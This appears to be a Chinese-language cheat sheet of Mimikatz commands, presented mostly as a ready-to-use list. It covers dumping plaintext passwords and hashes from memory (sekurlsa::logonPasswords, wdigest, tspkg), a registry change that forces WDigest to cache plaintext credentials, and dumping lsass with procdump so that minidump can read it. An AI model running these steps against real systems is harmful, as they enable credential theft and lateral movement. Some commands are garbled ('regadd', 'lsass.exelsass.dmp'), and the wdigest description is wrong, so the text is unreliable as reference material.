常用mimikatz命令合集

### 常用mimikatz命令合集详解 #### 概述 Mimikatz是一款功能强大的Windows安全工具，广泛应用于系统审计、密码恢复以及安全研究领域。它由法国安全专家Benjamin Delpy开发并维护。Mimikatz支持多种高级功能，包括但不限于密码抓取、权限提升、注册表操作、服务管理等。本文将详细介绍一系列常用的Mimikatz命令及其应用场景。 #### 清屏与退出 - **`cls`**：清除当前屏幕上的所有输出信息。 - **`exit`**：退出Mimikatz程序。 #### 版本信息 - **`version`**：显示Mimikatz的当前版本信息。 #### 系统信息查询 - **`system::user`**：列出当前登录系统的用户账户信息。 - **`system::computer`**：显示当前计算机的名称。 #### 进程管理 - **`process::list`**：列举系统中的所有进程。 - **`process::suspend [进程名称]`**：挂起指定名称的进程。 - **`process::stop [进程名称]`**：终止指定名称的进程。 - **`process::modules`**：展示系统的核心模块及其存储路径。 #### 服务管理 - **`service::list`**：列出系统中的所有服务。 - **`service::remove [服务名称]`**：移除指定的服务。 - **`service::startstop [服务名称]`**：启动或停止指定的服务。 #### 权限操作 - **`privilege::list`**：列出系统可用的所有权限。 - **`privilege::enable [权限名称]`**：启用指定的权限。 - **`privilege::debug`**：通过激活Debug权限来提升权限级别。 #### 打开系统工具 - **`nogpo::cmd`**：直接打开系统的命令提示符窗口（cmd.exe）。 - **`nogpo::regedit`**：打开注册表编辑器。 - **`nogpo::taskmgr`**：打开任务管理器。 #### 会话与进程查询 - **`ts::sessions`**：展示当前系统的所有会话。 - **`ts::processes`**：显示系统中的进程及其PID等相关信息。 #### 密码抓取 - **`sekurlsa::wdigest`**：抓取通过Windows凭据管理器存储的用户凭证信息，包括用户名和密码。 - **`sekurlsa::tspkg`**：抓取TSPKG类型的用户凭证信息。 - **`sekurlsa::logonPasswords`**：显示已登录用户的凭证信息，包括明文密码。 #### 修改注册表以捕获明文密码 为了能够捕获明文密码，需要修改以下注册表项： - **`regadd HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`**：此命令用于开启Windows凭据管理器中对明文密码的支持。修改完成后，重启系统生效。 #### 创建与读取dump文件 - **步骤1**：使用任务管理器找到lsass.exe进程，创建转储文件。 - **步骤2**：利用Procdump工具（例如procdump64.exe -accepteula -ma lsass.exelsass.dmp）自动生成lsass进程的转储文件。 - **`sekurlsa::minidump C:\Users\HUXIAO~1\AppData\Local\Temp\lsass.DMP`**：读取lsass.dmp文件以获取哈希密码。 #### 其他功能 - **`sekurlsa::logonPasswords full`**：全面显示登录用户的凭证信息，包括但不限于用户名、密码、SID等详细数据。 #### 密码破解资源链接 - **[Ophcrack](https://www.objectif-securite.ch/ophcrack.php)**：这是一个著名的Windows密码恢复工具网站，提供多种方法帮助用户恢复或重置忘记的Windows登录密码。 通过上述介绍，我们可以看到Mimikatz不仅功能强大，而且非常灵活。无论是进行系统审计还是密码恢复，甚至是更高级的安全研究工作，Mimikatz都是一款不可或缺的工具。当然，在实际应用过程中，务必遵守相关的法律法规，确保使用目的正当合法。